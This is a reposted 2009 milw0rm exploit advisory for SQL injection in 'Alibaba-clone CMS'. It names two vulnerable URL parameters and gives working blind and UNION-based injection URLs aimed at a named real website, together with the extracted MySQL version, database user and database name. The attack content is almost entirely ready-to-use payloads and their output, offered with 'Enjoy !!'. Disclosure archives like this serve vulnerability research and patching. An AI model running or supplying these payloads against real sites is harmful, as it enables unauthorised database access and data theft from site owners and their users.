Alibabaclone CMS SQLbSQL Remote SQL Injection Vulnerabilities

Document Sample
Alibabaclone CMS SQLbSQL Remote SQL Injection Vulnerabilities Powered By Docstoc
					                       Alibabaclone CMS SQLbSQL Remote SQL Injection Vulnerabilities                               Page 1/1
  1    # [+] Alibaba−clone CMS (SQL/bSQL) Remote SQL      Injection
  2
  3    #   [+]   Author : 599eme Man
  4    #   [+]   Contact : Flouf@live.fr
  5    #   [+]   Dowload : http://blog.duslerim.net/cms/alibabacom−clone−new.html
  6    #   [+]   Big Thanks to: Moudi :)
  7
  8    >> [+] Exploit :
  9
  10   http://www.site.com/path/supplier/view_contact_details.php?SellerID=(Blind) or (SQL)
  11
  12   http://www.site.com/path/category.php?IndustryID=(Blind) or (SQL)
  13
  14   >> [+] Demo BLIND:
  15
  16
  17   http://www.webdevelopmenthouse.com/alibaba−clone/category.php?IndustryID=25 and 1=1 <= true
  18   http://www.webdevelopmenthouse.com/alibaba−clone/category.php?IndustryID=25 and 1=2 <= false
  19
  20   http://www.webdevelopmenthouse.com/alibaba−clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=5 <=
        true
  21   http://www.webdevelopmenthouse.com/alibaba−clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=4 <=
        false
  22   The MYSQL version is : 5
  23
  24   http://www.webdevelopmenthouse.com/alibaba−clone/category.php?IndustryID=25+and+1=1+union+select+1,2,version()−−
  25   See now: 5.0.45−community−nt
  26
  27   http://www.webdevelopmenthouse.com/alibaba−clone/category.php?IndustryID=25+and+1=1+union+select+1,2,user()−−
  28   Nadir_db@temp−webs
  29
  30   http://www.webdevelopmenthouse.com/alibaba−clone/category.php?IndustryID=25+and+1=1+union+select+1,2,database()−−
  31   nas04
  32
  33
  34
  35   >> [+] Demo SQL:
  36
  37
  38   http://www.webdevelopmenthouse.com/alibaba−clone/category.php?IndustryID=18+union+select+1,2,version()−−
  39   The MYSQL version is : 5
  40
  41   http://www.webdevelopmenthouse.com/alibaba−clone/category.php?IndustryID=18+union+select+1,2,user()−−
  42   Nadir_db@temp−webs
  43
  44   http://www.webdevelopmenthouse.com/alibaba−clone/category.php?IndustryID=18+union+select+1,2,database()−−
  45   nas04
  46
  47
  48   Enjoy !!
  49
  50   # milw0rm.com [2009−07−20]
599eme Man                                                                                                         07/20/2009

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:30
posted:5/24/2010
language:English
pages:1